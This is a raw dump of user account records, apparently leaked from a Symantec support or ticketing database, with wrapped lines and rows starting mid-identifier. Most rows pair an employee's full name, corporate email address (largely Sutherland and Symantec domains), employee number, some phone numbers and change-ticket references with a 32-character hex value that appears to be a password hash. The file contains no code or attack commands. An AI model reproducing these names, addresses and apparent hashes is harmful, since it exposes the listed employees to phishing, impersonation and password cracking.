82-4d8c-82a0-338b7e11089b,<blank>,<blank>,Adrian_Fernandes@SUTH.COM,Sutherland,3
ad6b11f014fb29bc56ff44c950909b6,Anthony,<blank>,Adrian_Anthony_Fernandes,Adrian,
NULL,NULL,NULL
1e-44a0-b98e-22cf7e82c145,<blank>,<blank>,Afees_B@SUTH.COM,Sutherland,f7140bc7d8
c36d651ca4fc67fa6c6b16,B,<blank>,Afees_B,Afees,NULL,NULL,NULL
eb-4095-b32f-fba31d8b4852,<blank>,<blank>,Afeesh_PA@SUTH.COM,Sutherland,21bebff9
1dcd23df72abd55dd1d31b3a,P,<blank>,Afeesh_P_A,Afeesh,NULL,NULL,NULL
03-40c3-bc2a-a76748e66b0c,<blank>,<blank>,Aftab_Rizvi@SUTH.COM,Sutherland,a470c8
3bb404697d77bac1067240810a,Mukhtar,<blank>,Aftab_Mukhtar_Rizvi,Aftab,NULL,NULL,N
ULL
19-481b-baf9-cfbb38fcebdf,<blank>,<blank>,Afthab_KA@SUTH.COM,Sutherland,86456412
9b5435db2e2b9504732fd4cb,K,<blank>,Afthab_K_A,Afthab,NULL,NULL,NULL
b8-44fc-9642-7fe238f6b32e,<blank>,<blank>,Agila_A@SUTH.COM,Sutherland,04381281a1
bf4f30da1c63c19fc3d4de,A,<blank>,Agila_A,Agila,NULL,NULL,NULL
db-44b0-83f1-cca5bcfb6aa7,<blank>,<blank>,Akhil_JS@SUTH.COM,Sutherland,3cc8f6bc5
55d68e2970ffb5309f36bad,J,<blank>,Akhil_J_S,Akhil,NULL,NULL,NULL
0a-4f9a-a9fa-a0631b50816b,<blank>,<blank>,Akshay_Madane@SUTH.COM,Sutherland,8a31
5e8496935824c3c40584adb27137,Arun,<blank>,Akshay_Arun_Madane,Akshay,NULL,NULL,NU
LL
dae7-43f1-bb48-317154bf2f60,"CRQ000000602102 CLNP Mar22,2012",999-999-9999,tools
_id@symantec.suth.com,Sutherland,a2355a19f4e247263eb4061414d6685b,Garcia,<blank>
,222547,Christine Ann,NULL,NULL,NULL
30-47ae-b4cb-7d83b2026e5d,<blank>,<blank>,Akshay_Sangani@SUTH.COM,Sutherland,f8d
8a1f5f6bd2270af83ded77b027c5f,Mahesh,<blank>,Akshay_Mahesh_Sangani,Akshay,NULL,N
ULL,NULL
48-4566-b94f-746b860154bd,<blank>,<blank>,Akshit_Parikh@SUTH.COM,Sutherland,85d4
856e2756fb6a5e17ff6a395e5ec9,Prakash,<blank>,Akshit_Prakash_Parikh,Akshit,NULL,N
ULL,NULL
24-4858-a003-6394df1b5d9c,<blank>,<blank>,Alamelu_V@SUTH.COM,Sutherland,afcb8f08
47d8875639cf1dcee74c2f42,V,<blank>,Alamelu_V,Alamelu,NULL,NULL,NULL
3c-44a7-b285-5f64f75c2368,<blank>,<blank>,Albertina_Rapaka@SUTH.COM,Sutherland,3
25cf7142f3b9874815a8b4230d25613,Rapaka,<blank>,Albertina_Rapaka,Albertina,NULL,N
ULL,NULL
e586-4c04-89ab-392078e14c89,<blank>,<blank>,tools_id@symantec.suth.com,PM - 4/30
/2012 - CRQ000000642972,2f24760132364d2a29766144128949e8,Khan,<blank>,076014,Moh
sin,NULL,NULL,NULL
c15c-43aa-b9c3-0f4cac430d7e,<blank>,<blank>,george_henaresjr@SPI.COM,PM - 8/28/2
012 - CRQ000000783730,1103007af08fc2991e36f62189ab385d,Henares Jr.,<blank>,22946
8,George,NULL,NULL,NULL
9687-4454-805d-b736f74348fc,CRQ000000734326--vmd--17/07/2012,<blank>,tools_id@sy
mantec.suth.com,sutherland,91c0ee9a0d9722cb080dee82714337b6,Dsouza,<blank>,22794
8,Ryan,NULL,NULL,NULL
c8-4b80-8f34-70e33d73bf1e,<blank>,<blank>,PAAlifia@suth.com,Sutherland,8a54ea8a6
f7bef6551f34c811857b00c,Abbas,<blank>,Alifia_Abbas_Pachorawala,Alifia,NULL,NULL,
NULL
b9-4052-9d18-8917c3a26532,<blank>,<blank>,Alistair_Patcheco@SUTH.COM,Sutherland,
c9894d2ca0ed4944182ad4df05b851e7,Patcheco,<blank>,Alistair_Patcheco,Alistair,NUL
L,NULL,NULL
fa92-49e8-839f-c275abae2524,<blank>,5036147919,kevin_kerwien@symantec.com,Symant
ec,21fc82991bbf6a0dbf9d2435df03f804,Kerwien,<blank>,kevin_kerwien2,Kevin,NULL,NU
LL,NULL
8992-4166-9005-fc161f61c356,<blank>,<blank>,Alok_Mohanty@symantec.com,<blank>,82
04aeb3b6ca4f79136d379a95e7c8ae,Mohanty,<blank>,alok_mohanty,Alok,NULL,NULL,NULL
31-41f3-81b5-55e8e2e642c9,<blank>,<blank>,AbhinavSah_P@SUTH.COM,Sutherland,b41c0
2174632eb4c39f2a042cd0ce8d4,Sah,<blank>,Abhinav_Sah_P,Abhinav,NULL,NULL,NULL
b5-45c6-a4fd-a3a0ab5aebe7,<blank>,<blank>,Abhishaik_Sharma@SUTH.COM,Sutherland,6
e1d95174a85ae96627daf669452413e,Pradyumna,<blank>,Abhishaik_Pradyumna_Sharma,Abh
ishaik,NULL,NULL,NULL
32-4604-b6de-e774efe7347c,<blank>,<blank>,Abhishek_Parekh@SUTH.COM,Sutherland,2a
8c33884daf59f8a1e212ebac89824c,Bharat,<blank>,Abhishek_Bharat_Parekh,Abhishek,NU
LL,NULL,NULL
b0-4526-805b-69180e6440c2,<blank>,<blank>,Abhishek_GS@SUTH.COM,Sutherland,fb3a52
9a0f75707e78bb407017f707c3,G,<blank>,Abhishek_G_S,Abhishek,NULL,NULL,NULL
22-4a2c-b08e-4f2ce172a5fc,<blank>,<blank>,AbhishekVaidhayanathan_Iyer@SUTH.COM,S
utherland,306f57677dbbb3dc06d72d9fe4aba21e,Vaidhayanathan,<blank>,Abhishek_Vaidh
ayanathan_Iyer,Abhishek,NULL,NULL,NULL
4d-4f6d-91b9-504597a39463,<blank>,<blank>,Adarsh_Menon@SUTH.COM,Sutherland,9dc02
14d87429af4feb421faa468c562,Menon,<blank>,Adarsh_Menon,Adarsh,NULL,NULL,NULL
2c-435c-8410-48ab90388a10,<blank>,<blank>,Alvin_Thomas@SUTH.COM,Sutherland,91615
f163ed86f1429096af3aa80450a,Thomas,<blank>,Alvin_Thomas,Alvin,NULL,NULL,NULL
e0-407e-af34-689a3f51b312,<blank>,<blank>,Amal_Asokan@SUTH.COM,Sutherland,3a4080
0fbf7937df398a407665f0961d,Dev,<blank>,Amal_Dev_Asokan,Amal,NULL,NULL,NULL
2c-4510-910e-58ecea3656f2,<blank>,<blank>,Amal_C.S@SUTH.COM,Sutherland,03ae210d6
80eafb6541c7e2ff0a3d566,Raj,<blank>,Amal_Raj_C.S,Amal,NULL,NULL,NULL
fe-4936-8581-759d3951b858,<blank>,2633251,tools_id@symantec.suth.com,Sutherland,
43436d8c5979a5275ebac676fbfbc887,Vijay,<blank>,Amey_Vijay_Patankar,Amey,NULL,NUL
L,NULL
06-4c07-a4ac-b38cefa42f36,<blank>,2633288,tools_id@symantec.suth.com,Sutherland,
ff9834b71578257dc157b7d1d33a18ee,Vidyadhar,<blank>,Ameya_Vidyadhar_Patwardhan,Am
eya,NULL,NULL,NULL
34f2-4849-a2c2-e5565ab912ad,<blank>,<blank>,tools_id@symantec.suth.com,RM-28 Mar
ch 2012-CRQ000000609246,c3ac111820fe4c07bf1d3bc523ec8f09,V,<blank>,114711,Sudeep
,NULL,NULL,NULL
c3-42af-a89a-c7bafed59b5e,<blank>,<blank>,GRAmit@suth.com,Sutherland,13c91159aa2
6f78cfa1a8c322f1fffc2,Ranjit,<blank>,Amit_Ranjit_Ghosh,Amit,NULL,NULL,NULL
e8-4cca-b27d-8ee821493d5e,<blank>,<blank>,Amit_Bohra@SUTH.COM,Sutherland,ceffc00
3e8957b09233b9ea2bb3e72a4,Suresh,<blank>,Amit_Suresh_Bohra,Amit,NULL,NULL,NULL
24-40ce-ad18-42cb60332d28,<blank>,<blank>,ADaibagy@suth.com,Sutherland,b1d371b16
1c74c7eabd24dfeb404724e,Daibagya,<blank>,Amita_Daibagya,Amita,NULL,NULL,NULL
0b7e-4b51-aa3e-d4a651489021,bpr,INC000000066985,tools_id@symantec.suth.com,suthe
rland,181b6d7f3d52b80f7c284cf87a8f8855,Batreddi,<blank>,089781,SitaRamakrishna,N
ULL,NULL,NULL
1f-4dae-be64-d569ef84c8b3,<blank>,<blank>,Anand_Soni@SUTH.COM,Sutherland,a21a902
22adf5f6f2fe62e45d82e6707,Kumar,<blank>,Anand_Kumar_Soni,Anand,NULL,NULL,NULL
07-461c-8be8-6bc6c77db035,<blank>,<blank>,anand_mayooranathankodilingam@suth.co,
Sutherland,8e185d4d125fcfb20e7d95b52eff1e23,Mayooranathan,<blank>,Anand_Mayooran
athan_Kodilingam,Anand,NULL,NULL,NULL
f229-466a-9bb0-8cb87c41e812,CRQ000000653456 SP 8 May 2012,000-0000,prashanth_sri
nivasa@symantec.suth.com,Sutherland,16723b43e79e42efb4165a768df9971d,Srinivasa,<
blank>,224424,Prashanth,NULL,NULL,NULL
9a-498c-a642-c8e09cd35984,<blank>,<blank>,Anand_Rajkumar@SUTH.COM,Sutherland,ffc
d646697bb25aa57c2b159700759f3,Rajkumar,<blank>,Anand_Rajkumar,Anand,NULL,NULL,NU
LL
93-413b-9513-c00f9b050dc7,<blank>,<blank>,AnandRameshchandra_Jain@SUTH.COM,Suthe
rland,9049c27185e92f4b3f08ce95ecf3fe39,Rameshchandra,<blank>,Anand_Rameshchandra
_Jain,Anand,NULL,NULL,NULL
06-4c77-a876-54b1d53ac648,<blank>,<blank>,Anand_S2@SUTH.COM,Sutherland,0f8d727c6
fc1826daf6516bf78ed52e9,S,<blank>,Anand_S,Anand,NULL,NULL,NULL
8b-4815-aca7-05d77656e790,<blank>,<blank>,Anand_Sivadoss@suth.com,Sutherland,20c
e9b8d9fd050fd30f194c0528a0d1c,Sivadoss,<blank>,Anand_Sivadoss,Anand,NULL,NULL,NU
LL
9f-408f-8b75-acfdce867579,<blank>,<blank>,Anish_Gohil@SUTH.COM,Sutherland,172b10
a85fbf55b6dbe719326c4b5fae,Damji,<blank>,Anish_Damji_Gohil,Anish,NULL,NULL,NULL
9e-4c99-ae1a-250a7fa0519c,<blank>,<blank>,AnjanKumar_H@SUTH.COM,Sutherland,d847e
1db3f9ee4c4b1783a530c121090,Kumar,<blank>,Anjan_Kumar_H,Anjan,NULL,NULL,NULL
7b-4ce9-a930-a11b4a30eaad,<blank>,<blank>,Anjanathri_PK@SUTH.COM,Sutherland,1b3c
f34c0b7ebb588b05c0132ff8f0ab,P,<blank>,Anjanathri_P_K,Anjanathri,NULL,NULL,NULL
8c8-4592-a9c9-54ba68d84117,<blank>,89475/2635091,Tools_id@symantec.suth.com,"Sut
herland Global Services, Inc.",d46a5cf9c59e3ad89652c2a28642459b,Abraham,<blank>,
santhosh_abraham,Santhosh,NULL,NULL,NULL
731c-4ef6-990b-6015945dd3fa,<blank>,<blank>,Xiaoyu_Ren@symantec.com,CLTS,39584a4
b967d7e8b86cd3cd0047a8617,Ren,<blank>,Xiaoyu_Ren,Xiaoyu,NULL,NULL,NULL
45-4358-8826-57c710536995,<blank>,<blank>,TAmal@suth.com,Sutherland,a41da8739142
2e3471b44fcb6bf57e8f,Toms,<blank>,Amal_Toms,Amal,NULL,NULL,NULL
30-416b-a41f-fe61d7917f37,<blank>,<blank>,Aman_Sirohi@SUTH.COM,Sutherland,0db02e
6a6645835d5d299b2c4a922ed0,Sirohi,<blank>,Aman_Sirohi_Sirohi,Aman,NULL,NULL,NULL
01-49ac-925e-b15b1f95f1e6,<blank>,<blank>,Amarjit_Kambo@suth.com,Sutherland,6f13
bc5696a5f0e86d2ca2acdd6dde74,Singh,<blank>,Amarjit_Singh_Kambo,Amarjit,NULL,NULL
,NULL
1a-4a98-94f4-dad79dd791b0,<blank>,<blank>,AmeerHussain_A@SUTH.COM,Sutherland,66b
bba252e3ce908af0c5462bf7f9177,Hussain,<blank>,Ameer_Hussain_A,Ameer,NULL,NULL,NU
LL
78-4db5-835e-e0052a06d5b2,<blank>,<blank>,Ameraj_Chand@SUTH.COM,Sutherland,094f3
abdd0d5e11729fa47f746845f93,Chand,<blank>,Ameraj_Chand,Ameraj,NULL,NULL,NULL
53-4ee6-b072-05322fd5a091,<blank>,<blank>,Amit_Shedge@SUTH.COM,Sutherland,497498
e521f4b57f8481e8a20902dadf,Dnyaneshwar,<blank>,Amit_Dnyaneshwar_Shedge,Amit,NULL
,NULL,NULL
fa-4ce7-8951-6dd9fa7f3697,<blank>,2633284,tools_id@symantec.suth.com,Sutherland,
91eb1fc5e293fa5b98317b519064efaf,Indur,<blank>,Amit_Indur_Sachdev,Amit,NULL,NULL
,NULL
f2-4cd9-9a58-d4f7871f4b15,<blank>,<blank>,Amit_P@SUTH.COM,Sutherland,09aab102570
cd90020c00e61950d123e,P,<blank>,Amit_P,Amit,NULL,NULL,NULL
57-4991-a631-7a655bdecc90,<blank>,<blank>,AmitRajesh_Singh@SUTH.COM,Sutherland,5
f1b7ad79830967dd2a62d34b2a6a41a,Rajesh,<blank>,Amit_Rajesh_Singh,Amit,NULL,NULL,
NULL
ccae-4e72-9c9a-8f087e766150,CRQ000000374297-CLNP-26/10/2011,000-0000,AEugin_Samr
aj@symantec.com,Symantec,19173c52fcdca0716ee725fcd733aa69,Samraj,<blank>,121234,
A Eugin,NULL,NULL,NULL
54-4eb7-909d-0e9830e206d8,<blank>,<blank>,Amit_Rathiesh@SUTH.COM,Sutherland,23bf
bac9cc580236191c6181e211f47a,Rathiesh,<blank>,Amit_Rathiesh,Amit,NULL,NULL,NULL
54-4528-a26f-6be5833ae8e1,<blank>,2633288,tools_id@symantec.suth.com,Sutherland,
186ab13ba9f3b15c7be512279eb33b20,Tiwari,<blank>,Amit_Tiwari,Amit,NULL,NULL,NULL
d1-482a-917b-c8b7b158cf30,<blank>,<blank>,Amol_Dhiware@SUTH.COM,Sutherland,cdcc0
662e636548bb5379ab496deb3a8,Ashok,<blank>,Amol_Ashok_Dhiware,Amol,NULL,NULL,NULL
db-44ed-b647-d6c922f696ea,<blank>,<blank>,Amrita_Ashok@SUTH.COM,Sutherland,93308
f27f93f52b301384c39eeeecd47,Ashok,<blank>,Amrita_Ashok_Chawla,Amrita,NULL,NULL,N
ULL
ba-40a2-a16f-6e3948814fb5,<blank>,<blank>,Anand_VA@SUTH.COM,Sutherland,74a074c3c
eabcf11843511a88d83c4cc,V,<blank>,Anand_V_A,Anand,NULL,NULL,NULL
80e9-49f6-a62f-5a96fa9618d0,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,d14bb5e792d3cf39fe7077dc1af607c2,Uppalapati,<blank>,pbharadwaj_uppalapati
_cc,P.Bharadwaj ,NULL,NULL,NULL
f2-49db-ac28-eb09779d2429,<blank>,<blank>,AnanthMohan_K@SUTH.COM,Sutherland,62da
227a028cdbbcc80a24fc8d56f14d,Mohan,<blank>,Ananth_Mohan_K,Ananth,NULL,NULL,NULL
02-4177-8cca-9bd580d6d65e,<blank>,<blank>,Ananth_Rajagopalan@SUTH.COM,Sutherland
,7d7451eb82643936ed4757c62fa20190,Rajagopalan,<blank>,Ananth_Rajagopalan,Ananth,
NULL,NULL,NULL
d013-4f35-82a2-e43b9fe0dc01,CRQ000000601448--vmd--22/03/2012,000-000,ronaldo_abl
aza@Suth.com,Sutherland,2aea81bcc7185b64080fadfe18798820,Ablaza,<blank>,222592,R
onaldo,NULL,NULL,NULL
e3-4693-8d7f-f92b0a9ce539,<blank>,<blank>,Anil_Soni@SUTH.COM,Sutherland,15c28088
cad1d27d36cb7eaeb20de167,Shankarlal,<blank>,Anil_Shankarlal_Soni,Anil,NULL,NULL,
NULL
c3-455e-9975-38dc18e624ff,<blank>,2633251,tools_id@symantec.suth.com,Sutherland,
9bac2d835fcf621dbb6122b78af64544,Mukhopadhyay,<blank>,Anirvanjyoti_Mukhopadhyay,
Anirvanjyoti,NULL,NULL,NULL
cc-4482-b76d-8c39df0b6397,<blank>,<blank>,Anish_A@SUTH.COM,Sutherland,5fe9dce0c8
bdd57de7ece334fa0bc101,A,<blank>,Anish_A,Anish,NULL,NULL,NULL
bf12-45f6-9e82-30a398250ffc,CRQ000000601521--vmd--22/03/2012,000-000,johncarlo_a
lila@Suth.com,Sutherland,40b60d64d3ecd75eee053455c67ae1f4,Alila,<blank>,222593,J
ohn Carlo,NULL,NULL,NULL
6a-4357-8992-91ec89b7b2a3,<blank>,<blank>,Anish_Oommen@SUTH.COM,Sutherland,ab971
6c33d32d695a5e615bf96084138,Koshy,<blank>,Anish_Koshy_Oommen,Anish,NULL,NULL,NUL
L
be-4b51-9228-b239d033069a,<blank>,<blank>,Anishkumar_Jayadevan@SUTH.COM,Sutherla
nd,bb9b0ce5059c594a9b514325c37df3b8,Kumar,<blank>,Anish_Kumar_Jayadevan,Anish,NU
LL,NULL,NULL
75aa-4f7c-a4ce-f2f459f45cc1,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,a17cf92f78c44cb9fc4bf4a847cac479,Malyala,<blank>,venkatsridhar_malyala_cc
,VenkatSridhar ,NULL,NULL,NULL
d7-42e9-9370-d85726231d15,<blank>,<blank>,Anita_Kotian@suth.com,Sutherland,7a6be
d251da5c62f28a26b7f84f6a191,Sanjiva,<blank>,Anita_Sanjiva_Kotian,Anita,NULL,NULL
,NULL
ea3a-4eb5-a837-f7a74e07851b,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,ba090f424b864b8ab4e484cc877ea3a0,Rani,<blank>,msandhya_rani_cc,MSandhya,N
ULL,NULL,NULL
7eb3-4ea4-af8a-80c7a058caa9,<blank>,<blank>,andrea_ureta@SPI.COM,PM - 9/6/2012 -
CRQ000000795071,cf8627bb44ad31d7aa35e50e1777b061,Ureta,<blank>,229567,Andrea,NU
LL,NULL,NULL
ce51-4baf-b416-312a901fd4a3,BPR-13-01-10,EMPROV/INC87845,accounts@symantec.telep
erformance.gr,Teleperformance,74b65da66a1f1f191e40b85cefdba03f,Karavokyros,<blan
k>,072222,Themelis,NULL,NULL,NULL
46-4e91-9865-d5a9fcffdaea,<blank>,<blank>,Anitha_Durai@suth.com,Sutherland,7489d
a4370e8a857fc361ea2643be824,Durai,<blank>,Anitha_Durai,Anitha,NULL,NULL,NULL
7d-4743-88a9-2ae3dcbaae85,<blank>,<blank>,Anitha_Francis2@SUTH.COM,Sutherland,41
5b6d4c4aca8c1b313ef66dae59c3d9,Francis,<blank>,Anitha_Francis_Mathew,Anitha,NULL
,NULL,NULL
27-42cf-9a7a-e78e04aff473,<blank>,<blank>,Anjali_Menon@SUTH.COM,Sutherland,d7568
31c0353bf18a2e848a149dcdb80,Menon,<blank>,Anjali_Menon,Anjali,NULL,NULL,NULL
c5-4070-abbc-9bff3ae5906f,<blank>,<blank>,Anju_Rajesh@SUTH.COM,Sutherland,c94225
b9f86db71ccdfd008ce3611ecb,Rajesh,<blank>,Anju_Rajesh,Anju,NULL,NULL,NULL
78-451e-8eba-e765e27be03a,<blank>,<blank>,Anju_Pandian@SUTH.COM,Sutherland,cd90b
fe917bf126e43ebe8e56dc52806,Sandhya,<blank>,Anju_Sandhya_Pandian,Anju,NULL,NULL,
NULL
dc32-4b29-8468-4de66fc741d5,CRQ000000598479--vmd-21/03/2012,000-000,katherine_fa
ustino@Suth.com,Sutherland,e272fb1cfe386fdeab659e8844fa3eb2,Faustino,<blank>,222
522,Katherine,NULL,NULL,NULL
64-47c7-afb0-db6469ffaa53,<blank>,<blank>,Annie_George@SUTH.COM,Sutherland,ee8b8
1a627dc830077fb7a00176cb89e,George,<blank>,Annie_George,Annie,NULL,NULL,NULL
63-4edd-a981-887a8664ca8d,<blank>,<blank>,Anoop_Varghese@SUTH.COM,Sutherland,464
f4cc55632eaa0830a0812d0d895f6,Edicula,<blank>,Anoop_Edicula_Varghese,Anoop,NULL,
NULL,NULL
d3-424e-9d2d-23e203f1135b,<blank>,<blank>,Anoop_Palakandy@SUTH.COM,Sutherland,65
4f82feaa4a65d987e4ff76eafb59f0,Palakandy,<blank>,Anoop_Palakandy,Anoop,NULL,NULL
,NULL
9c-4c6e-944f-d0b0c985b774,<blank>,<blank>,Anoop_TK@SUTH.COM,Sutherland,def7dcca2
d375c2ec20c0d35cd9ea5aa,T,<blank>,Anoop_T_K,Anoop,NULL,NULL,NULL
71-4c25-ae2d-5bd2153d7145,<blank>,<blank>,Anto_Dumenil@suth.com,Sutherland,9a26d
cc127a94ae92690e1c270a4a10f,Clato,<blank>,Anto_Clato_Dumenil,Anto,NULL,NULL,NULL
82-4501-8e74-1953e112011b,<blank>,<blank>,Antony_Thomas@SUTH.COM,Sutherland,96ab
d5d536b751b0dcaeea855a7f0857,Thomas,<blank>,Antony_Thomas,Antony,NULL,NULL,NULL
d2-44c0-8a94-69221973ab7a,<blank>,<blank>,Anu_Antony@SUTH.COM,Sutherland,96c9fee
8677306d7b3ff9de3b6148384,Antony,<blank>,Anu_Antony,Anu,NULL,NULL,NULL
d6-4932-8892-617f92599231,<blank>,<blank>,Anu_KVS@SUTH.COM,Sutherland,0663e13351
0f90f61a5fc21b9216b11f,K,<blank>,Anu_K_V_S,Anu,NULL,NULL,NULL
ca-4bcb-b927-09b3d4a7100c,<blank>,<blank>,Anu_Jose@SUTH.COM,Sutherland,389fcbf0d
6dbff2e5cc3676373a5a2f5,T,<blank>,Anu_T_Jose,Anu,NULL,NULL,NULL
78-429c-8980-82b27f17b69e,<blank>,<blank>,Anuj_Nanda@SUTH.COM,Sutherland,e437380
4b154e205446cf561756e43f8,Tarun,<blank>,Anuj_Tarun_Nanda,Anuj,NULL,NULL,NULL
5c-46bd-b7b5-321876bf9d48,<blank>,<blank>,Anulal_S@SUTH.COM,Sutherland,1f7554139
5bb569dba8a5f386d57f449,S,<blank>,Anulal_S,Anulal,NULL,NULL,NULL
a30e-4503-a3d6-7a11d42e279e,<blank>,<blank>,Cooper_Wang@symantec.com,CLTS,71de47
748b7bea5ff1196b7d53aa4c91,Wang,<blank>,Cooper_Wang,Cooper,NULL,NULL,NULL
6637-4d90-a0c5-650ec920c409,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
Global Services,5d7f34d79a33e5add5be8f997e720783,Chevalier,<blank>,085693,Micha
el ,NULL,NULL,NULL
a0-464b-89d8-ab5a67332073,<blank>,<blank>,Anuragh_R@SUTH.COM,Sutherland,d1af2a80
72058066ee7ef92ef370fdd7,R,<blank>,Anuragh_R,Anuragh,NULL,NULL,NULL
7a-47b8-a38e-71b63b736698,<blank>,<blank>,Anusha_K@SUTH.COM,Sutherland,60b722934
ba289c09f9b6d3fbe634dc0,K,<blank>,Anusha_K,Anusha,NULL,NULL,NULL
8cbb-4e96-bc46-93359e615f8b,<blank>,<blank>,Wayne_yang@symantec.com,CLTS,b4a6e3f
0c7022de800622494b9e59afc,yang,<blank>,Wayne_yang,Wayne,NULL,NULL,NULL
bc-4566-975d-e895546ed202,<blank>,<blank>,Arasananthan_R@SUTH.COM,Sutherland,e57
2c717ae2078b183727938116e166b,R,<blank>,Arasananthan_R,Arasananthan,NULL,NULL,NU
LL
d72d-4954-b78a-666d6fa90dee,"CRQ000000602105 CLNP Mar22,2012",999-999-9999,tools
_id@symantec.suth.com,Sutherland,69bbbf49b4776388e9072f0dbeb7850c,Arceo,<blank>,
222549,Albert,NULL,NULL,NULL
9a-4992-b01d-c8bed7570b28,<blank>,<blank>,Arthur_Soans@suth.com,Sutherland,5c385
81e5889a2c0ff9da69733e3dc53,Sunwil,<blank>,Arthur_Sunwil_Soans,Arthur,NULL,NULL,
NULL
3f-4398-a0b9-fff11da026e0,<blank>,<blank>,Ancy_Binu@SUTH.COM,Sutherland,b42a5589
3e429717dfd9729ad065fd0f,Binu,<blank>,Ancy_Binu,Ancy,NULL,NULL,NULL
fc-4b25-924c-a9eb44f12187,<blank>,2633251,tools_id@symantec.suth.com,Sutherland,
613ebbce2d0fa86f20da5216a67fdadb,Anthony,<blank>,Andrew_Anthony_Fernandes,Andrew
,NULL,NULL,NULL
e7f9-4327-a239-21d00fb2d6d4,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,7
4ac0206882b052ee3e84a4465a2403e,Sathish Chandran,<blank>,089157,Prathish,NULL,NU
LL,NULL
68-4164-bbaf-7ca6919779bc,<blank>,<blank>,AneeshPrasad_R@SUTH.COM,Sutherland,671
bdd442da7dc92a094591834323937,Prasad,<blank>,Aneesh_Prasad_R,Aneesh,NULL,NULL,NU
LL
be-41f3-9be1-97261bedf754,<blank>,<blank>,Angelo_Fernandes@SUTH.COM,Sutherland,2
0d2e8bc85dea5c4625b098a7e36ad29,Domnic,<blank>,Angelo_Domnic_Fernandes,Angelo,NU
LL,NULL,NULL
87-4050-b5f3-4eef1f51667e,<blank>,<blank>,Angika_Nath@SUTH.COM,Sutherland,9d7969
a14e599d70a6c41a49ba4ce601,Nath,<blank>,Angika_Nath,Angika,NULL,NULL,NULL
08-41e0-a68d-11981a0e56cc,<blank>,<blank>,Anij_TJ@SUTH.COM,Sutherland,bea4e95813
a0f03264e0e092f34818a8,T,<blank>,Anij_T_J,Anij,NULL,NULL,NULL
68-4bb3-bee8-2cdee1df7e36,<blank>,<blank>,Anil_Babu@suth.com,Sutherland,1d630b43
893f98ace08743c575a264dc,Babu,<blank>,Anil_Babu_Katragada_Venkateshwara_Ragavend
ra,Anil,NULL,NULL,NULL
c2fc-4959-b706-038e244d24c4,"CRQ000000340924-RJ-Sep 19, 2011",000-0000,karlbened
ickjoaquin_@SUTH.COM,Sutherland,0e09f517ef62dbfbfba8a7f76acfa527,Baruis,<blank>,
120495,Karl Benedick Joaquin,NULL,NULL,NULL
c720-405d-91c1-520bfcc47dfe,CRQ000000346811 SP 28 Sep 2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,4257dbedd2f41723145d823422294a8e,Sharma K,<blank>,1209
22,Sunitha,NULL,NULL,NULL
9095-4ef1-a5f6-c69546ffb004,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
346914 - PR - 29th Sept 2011,6256c504c3e91eedc745a57d0bc8fcdc,Pius,<blank>,11610
1,Anil ,NULL,NULL,NULL
2ac7-443f-9e43-bd24308e0ff4,CRQ000000247844,<blank>,tools_id@symantec.suth.com,K
SC-04/28/2011,de7388142b568196859986ce3cf55410,Francia,<blank>,115583,AprilKenne
th,NULL,NULL,NULL
663d-4616-a01c-be28bdc933cf,CRQ000000655181--vmd--09/05/2012,<blank>,ChandaniK_T
hejaswi@symantec.com,symantec,1c9eea7d03df4c5eb265afe1149add48,Thejaswi,<blank>,
117748,Chandani K,NULL,NULL,NULL
77-4b48-8b8f-c6ae2f0e1861,<blank>,<blank>,Arun_P@SUTH.COM,Sutherland,522a0a99c3a
c51f3082e6e096379dae8,P,<blank>,Arun_P,Arun,NULL,NULL,NULL
54-4a8b-ab16-071bdb424eab,<blank>,<blank>,Aruna_IS@SUTH.COM,Sutherland,85a7201c8
26952d60b8f8bb40cb1ee38,I,<blank>,Aruna_I_S,Aruna,NULL,NULL,NULL
a6-4c74-95cc-1c80e4c675fa,<blank>,<blank>,Aruna_Rani@suth.com,Sutherland,80555ac
460bbfd93416717d71af8906e,Rani,<blank>,Aruna_Rani_Shanmugaraj,Aruna,NULL,NULL,NU
LL
59-4f64-aa0a-5b1ae0791126,<blank>,<blank>,Ashish_joharle@suth.com,Sutherland,be2
479e8f0e8132bbf9dce420359775a,Sunil,<blank>,Ashish_Sunil_Joharle,Ashish,NULL,NUL
L,NULL
c4-4443-90e5-1b577e8f7927,<blank>,<blank>,Ashley_Titus@SUTH.COM,Sutherland,77de6
3cf02c0d399a419d5290fed28dd,Titus,<blank>,Ashley_Titus,Ashley,NULL,NULL,NULL
f7f4-4ad2-aafe-2654d7fc9a46,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
346914 - PR - 29th Sept 2011,9aadd085d48934c45c1bf8660e9178b2,Padman,<blank>,113
495,Varun ,NULL,NULL,NULL
65-45fc-b59d-fc7a7069015a,<blank>,<blank>,Ashokkumar_E@SUTH.COM,Sutherland,01bfd
65a2a63b4109ec1b45fa53b7cc9,kumar,<blank>,Ashok_kumar_E,Ashok,NULL,NULL,NULL
b3-4aff-ada2-bb1ea61907dc,<blank>,<blank>,Ashoke_PK@SUTH.COM,Sutherland,23f78259
502296ee4c0dab6e3fadae48,Kulandaivel,<blank>,Ashoke_Kulandaivel,Ashoke,NULL,NULL
,NULL
10-4749-a09d-2f2af5a2fa46,<blank>,<blank>,Asim_Sharieff@SUTH.COM,Sutherland,7c74
90187786fbe2b4c816ee6abc76de,Omar,<blank>,Asim_Omar_Sharieff,Asim,NULL,NULL,NULL
6dac-48c6-a3da-0fda67d026c5,INC213497,nam 07/16/2010,tools_id@symantec.suth.com,
Sutherland,99797550d80c5842d38d0edd798ee83e,Manoharan,<blank>,075764,Prakash,NUL
L,NULL,NULL
bb-4425-b989-bd2e8cc97c81,<blank>,<blank>,Athul_M@SUTH.COM,Sutherland,44be317f47
cedd4ac62ade161a80a949,M,<blank>,Athul_M,Athul,NULL,NULL,NULL
75-4051-9b3a-cbc4e565f16a,<blank>,<blank>,AnjuJeetbahadur_Thapa@SUTH.COM,Sutherl
and,ea19eea625d6dd2fe636de9d4210d958,Jeetbahadur,<blank>,Anju_Jeetbahadur_Thapa,
Anju,NULL,NULL,NULL
d2d-4c09-989e-ad90fbe7a1b3,<blank>,85724,Tools_id@symantec.suth.com,Sutherland G
lobal Services,aaa2b17b81c9c02084f00ae41c770aec,Carter,<blank>,niki_carter,Niki,
NULL,NULL,NULL
